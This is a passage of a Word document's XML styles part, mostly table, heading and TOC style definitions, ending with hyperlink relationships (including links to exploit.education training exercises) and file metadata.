      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="731">
    <w:name w:val="Title Char"/>
    <w:link w:val="730"/>
    <w:uiPriority w:val="10"/>
    <w:rPr>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="732">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="888"/>
    <w:next w:val="888"/>
    <w:link w:val="733"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="200" w:after="200"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="733">
    <w:name w:val="Subtitle Char"/>
    <w:link w:val="732"/>
    <w:uiPriority w:val="11"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="734">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="888"/>
    <w:next w:val="888"/>
    <w:link w:val="735"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="720" w:right="720"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="735">
    <w:name w:val="Quote Char"/>
    <w:link w:val="734"/>
    <w:uiPriority w:val="29"/>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="736">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="888"/>
    <w:next w:val="888"/>
    <w:link w:val="73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7">
    <w:name w:val="Intense Quote Char"/>
    <w:link w:val="736"/>
    <w:uiPriority w:val="30"/>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="738">
    <w:name w:val="Header"/>
    <w:basedOn w:val="888"/>
    <w:link w:val="739"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:tabs>
        <w:tab w:val="center" w:pos="7143" w:leader="none"/>
        <w:tab w:val="right" w:pos="14287" w:leader="none"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="739">
    <w:name w:val="Header Char"/>
    <w:link w:val="738"/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="740">
    <w:name w:val="Footer"/>
    <w:basedOn w:val="888"/>
    <w:link w:val="743"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:tabs>
        <w:tab w:val="center" w:pos="7143" w:leader="none"/>
        <w:tab w:val="right" w:pos="14287" w:leader="none"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="741">
    <w:name w:val="Footer Char"/>
    <w:link w:val="740"/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="742">
    <w:name w:val="Caption"/>
    <w:basedOn w:val="888"/>
    <w:next w:val="888"/>
    <w:uiPriority w:val="35"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:line="276" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4f81bd" w:themeColor="accent1"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="743">
    <w:name w:val="Caption Char"/>
    <w:basedOn w:val="742"/>
    <w:link w:val="740"/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="table" w:styleId="744">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="88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5">
    <w:name w:val="Table Grid Light"/>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6">
    <w:name w:val="Plain Table 1"/>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7">
    <w:name w:val="Plain Table 2"/>
    <w:basedOn w:val="88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3"/>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9">
    <w:name w:val="Plain Table 4"/>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0">
    <w:name w:val="Plain Table 5"/>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1">
    <w:name w:val="Grid Table 1 Light"/>
    <w:basedOn w:val="88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2">
    <w:name w:val="Grid Table 1 Light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3">
    <w:name w:val="Grid Table 1 Light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4">
    <w:name w:val="Grid Table 1 Light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5">
    <w:name w:val="Grid Table 1 Light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6">
    <w:name w:val="Grid Table 1 Light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7">
    <w:name w:val="Grid Table 1 Light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8">
    <w:name w:val="Grid Table 2"/>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9">
    <w:name w:val="Grid Table 2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0">
    <w:name w:val="Grid Table 2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1">
    <w:name w:val="Grid Table 2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2">
    <w:name w:val="Grid Table 2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3">
    <w:name w:val="Grid Table 2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4">
    <w:name w:val="Grid Table 2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5">
    <w:name w:val="Grid Table 3"/>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4"/>
    <w:basedOn w:val="88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3">
    <w:name w:val="Grid Table 4 - Accent 1"/>
    <w:basedOn w:val="88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4">
    <w:name w:val="Grid Table 4 - Accent 2"/>
    <w:basedOn w:val="88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5">
    <w:name w:val="Grid Table 4 - Accent 3"/>
    <w:basedOn w:val="88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6">
    <w:name w:val="Grid Table 4 - Accent 4"/>
    <w:basedOn w:val="88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7">
    <w:name w:val="Grid Table 4 - Accent 5"/>
    <w:basedOn w:val="88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8">
    <w:name w:val="Grid Table 4 - Accent 6"/>
    <w:basedOn w:val="88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9">
    <w:name w:val="Grid Table 5 Dark"/>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0">
    <w:name w:val="Grid Table 5 Dark- Accent 1"/>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1">
    <w:name w:val="Grid Table 5 Dark - Accent 2"/>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2">
    <w:name w:val="Grid Table 5 Dark - Accent 3"/>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3">
    <w:name w:val="Grid Table 5 Dark- Accent 4"/>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4">
    <w:name w:val="Grid Table 5 Dark - Accent 5"/>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5">
    <w:name w:val="Grid Table 5 Dark - Accent 6"/>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6">
    <w:name w:val="Grid Table 6 Colorful"/>
    <w:basedOn w:val="88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7">
    <w:name w:val="Grid Table 6 Colorful - Accent 1"/>
    <w:basedOn w:val="88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8">
    <w:name w:val="Grid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9">
    <w:name w:val="Grid Table 6 Colorful - Accent 3"/>
    <w:basedOn w:val="88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0">
    <w:name w:val="Grid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1">
    <w:name w:val="Grid Table 6 Colorful - Accent 5"/>
    <w:basedOn w:val="88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2">
    <w:name w:val="Grid Table 6 Colorful - Accent 6"/>
    <w:basedOn w:val="88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3">
    <w:name w:val="Grid Table 7 Colorful"/>
    <w:basedOn w:val="88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4">
    <w:name w:val="Grid Table 7 Colorful - Accent 1"/>
    <w:basedOn w:val="88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5">
    <w:name w:val="Grid Table 7 Colorful - Accent 2"/>
    <w:basedOn w:val="88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6">
    <w:name w:val="Grid Table 7 Colorful - Accent 3"/>
    <w:basedOn w:val="88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7">
    <w:name w:val="Grid Table 7 Colorful - Accent 4"/>
    <w:basedOn w:val="88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8">
    <w:name w:val="Grid Table 7 Colorful - Accent 5"/>
    <w:basedOn w:val="88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9">
    <w:name w:val="Grid Table 7 Colorful - Accent 6"/>
    <w:basedOn w:val="88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0">
    <w:name w:val="List Table 1 Light"/>
    <w:basedOn w:val="88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1">
    <w:name w:val="List Table 1 Light - Accent 1"/>
    <w:basedOn w:val="88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2">
    <w:name w:val="List Table 1 Light - Accent 2"/>
    <w:basedOn w:val="88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3">
    <w:name w:val="List Table 1 Light - Accent 3"/>
    <w:basedOn w:val="88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4">
    <w:name w:val="List Table 1 Light - Accent 4"/>
    <w:basedOn w:val="88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5">
    <w:name w:val="List Table 1 Light - Accent 5"/>
    <w:basedOn w:val="88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6">
    <w:name w:val="List Table 1 Light - Accent 6"/>
    <w:basedOn w:val="88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7">
    <w:name w:val="List Table 2"/>
    <w:basedOn w:val="88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8">
    <w:name w:val="List Table 2 - Accent 1"/>
    <w:basedOn w:val="88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9">
    <w:name w:val="List Table 2 - Accent 2"/>
    <w:basedOn w:val="88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0">
    <w:name w:val="List Table 2 - Accent 3"/>
    <w:basedOn w:val="88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1">
    <w:name w:val="List Table 2 - Accent 4"/>
    <w:basedOn w:val="88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2">
    <w:name w:val="List Table 2 - Accent 5"/>
    <w:basedOn w:val="88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3">
    <w:name w:val="List Table 2 - Accent 6"/>
    <w:basedOn w:val="88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4">
    <w:name w:val="List Table 3"/>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5">
    <w:name w:val="List Table 3 - Accent 1"/>
    <w:basedOn w:val="88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6">
    <w:name w:val="List Table 3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7">
    <w:name w:val="List Table 3 - Accent 3"/>
    <w:basedOn w:val="88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8">
    <w:name w:val="List Table 3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9">
    <w:name w:val="List Table 3 - Accent 5"/>
    <w:basedOn w:val="88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0">
    <w:name w:val="List Table 3 - Accent 6"/>
    <w:basedOn w:val="88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1">
    <w:name w:val="List Table 4"/>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2">
    <w:name w:val="List Table 4 - Accent 1"/>
    <w:basedOn w:val="88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3">
    <w:name w:val="List Table 4 - Accent 2"/>
    <w:basedOn w:val="88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4">
    <w:name w:val="List Table 4 - Accent 3"/>
    <w:basedOn w:val="88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5">
    <w:name w:val="List Table 4 - Accent 4"/>
    <w:basedOn w:val="88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6">
    <w:name w:val="List Table 4 - Accent 5"/>
    <w:basedOn w:val="88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7">
    <w:name w:val="List Table 4 - Accent 6"/>
    <w:basedOn w:val="88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8">
    <w:name w:val="List Table 5 Dark"/>
    <w:basedOn w:val="88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1"/>
    <w:basedOn w:val="88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2"/>
    <w:basedOn w:val="88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3"/>
    <w:basedOn w:val="88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4"/>
    <w:basedOn w:val="88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5"/>
    <w:basedOn w:val="88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6"/>
    <w:basedOn w:val="88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6 Colorful"/>
    <w:basedOn w:val="88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6">
    <w:name w:val="List Table 6 Colorful - Accent 1"/>
    <w:basedOn w:val="88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7">
    <w:name w:val="List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8">
    <w:name w:val="List Table 6 Colorful - Accent 3"/>
    <w:basedOn w:val="88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9">
    <w:name w:val="List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0">
    <w:name w:val="List Table 6 Colorful - Accent 5"/>
    <w:basedOn w:val="88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1">
    <w:name w:val="List Table 6 Colorful - Accent 6"/>
    <w:basedOn w:val="88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2">
    <w:name w:val="List Table 7 Colorful"/>
    <w:basedOn w:val="88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3">
    <w:name w:val="List Table 7 Colorful - Accent 1"/>
    <w:basedOn w:val="88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4">
    <w:name w:val="List Table 7 Colorful - Accent 2"/>
    <w:basedOn w:val="88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5">
    <w:name w:val="List Table 7 Colorful - Accent 3"/>
    <w:basedOn w:val="88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6">
    <w:name w:val="List Table 7 Colorful - Accent 4"/>
    <w:basedOn w:val="88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7">
    <w:name w:val="List Table 7 Colorful - Accent 5"/>
    <w:basedOn w:val="88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8">
    <w:name w:val="List Table 7 Colorful - Accent 6"/>
    <w:basedOn w:val="88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9">
    <w:name w:val="Lined - Accent"/>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0">
    <w:name w:val="Lined - Accent 1"/>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1">
    <w:name w:val="Lined - Accent 2"/>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2">
    <w:name w:val="Lined - Accent 3"/>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3">
    <w:name w:val="Lined - Accent 4"/>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4">
    <w:name w:val="Lined - Accent 5"/>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5">
    <w:name w:val="Lined - Accent 6"/>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6">
    <w:name w:val="Bordered &amp; Lined - Accent"/>
    <w:basedOn w:val="88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7">
    <w:name w:val="Bordered &amp; Lined - Accent 1"/>
    <w:basedOn w:val="88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8">
    <w:name w:val="Bordered &amp; Lined - Accent 2"/>
    <w:basedOn w:val="88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9">
    <w:name w:val="Bordered &amp; Lined - Accent 3"/>
    <w:basedOn w:val="88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0">
    <w:name w:val="Bordered &amp; Lined - Accent 4"/>
    <w:basedOn w:val="88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1">
    <w:name w:val="Bordered &amp; Lined - Accent 5"/>
    <w:basedOn w:val="88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2">
    <w:name w:val="Bordered &amp; Lined - Accent 6"/>
    <w:basedOn w:val="88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3">
    <w:name w:val="Bordered"/>
    <w:basedOn w:val="88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4">
    <w:name w:val="Bordered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5">
    <w:name w:val="Bordered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6">
    <w:name w:val="Bordered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7">
    <w:name w:val="Bordered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8">
    <w:name w:val="Bordered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9">
    <w:name w:val="Bordered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0">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:color w:val="0000ff" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="871">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="888"/>
    <w:link w:val="872"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="872">
    <w:name w:val="Footnote Text Char"/>
    <w:link w:val="871"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="873">
    <w:name w:val="footnote reference"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="874">
    <w:name w:val="endnote text"/>
    <w:basedOn w:val="888"/>
    <w:link w:val="875"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="875">
    <w:name w:val="Endnote Text Char"/>
    <w:link w:val="874"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="876">
    <w:name w:val="endnote reference"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="877">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="888"/>
    <w:next w:val="888"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      <w:spacing w:after="57"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="878">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="888"/>
    <w:next w:val="888"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="283" w:right="0" w:firstLine="0"/>
      <w:spacing w:after="57"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="879">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="888"/>
    <w:next w:val="888"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="567" w:right="0" w:firstLine="0"/>
      <w:spacing w:after="57"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="880">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="888"/>
    <w:next w:val="888"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="850" w:right="0" w:firstLine="0"/>
      <w:spacing w:after="57"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="881">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="888"/>
    <w:next w:val="888"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="1134" w:right="0" w:firstLine="0"/>
      <w:spacing w:after="57"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="882">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="888"/>
    <w:next w:val="888"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="1417" w:right="0" w:firstLine="0"/>
      <w:spacing w:after="57"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="883">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="888"/>
    <w:next w:val="888"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="1701" w:right="0" w:firstLine="0"/>
      <w:spacing w:after="57"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="884">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="888"/>
    <w:next w:val="888"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="1984" w:right="0" w:firstLine="0"/>
      <w:spacing w:after="57"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="885">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="888"/>
    <w:next w:val="888"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="2268" w:right="0" w:firstLine="0"/>
      <w:spacing w:after="57"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="886">
    <w:name w:val="TOC Heading"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="887">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="888"/>
    <w:next w:val="888"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:after="0" w:afterAutospacing="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="888" w:default="1">
    <w:name w:val="Normal"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="table" w:styleId="889" w:default="1">
    <w:name w:val="Normal Table"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:tblPr>
      <w:tblInd w:w="0" w:type="dxa"/>
      <w:tblCellMar>
        <w:left w:w="108" w:type="dxa"/>
        <w:top w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="numbering" w:styleId="890" w:default="1">
    <w:name w:val="No List"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="891">
    <w:name w:val="No Spacing"/>
    <w:basedOn w:val="888"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="892">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="888"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:pPr>
      <w:contextualSpacing/>
      <w:ind w:left="720"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="8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www.ecommerce.com/applicazioni/inpututente?param1=00 0203356155&#182;m2=2022Sep20" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://exploit.education/nebula/level-01/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://exploit.education/protostar/stack-zero/"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2022-10-10T10:05:43Z</dcterms:modified>
</cp:coreProperties>
</file>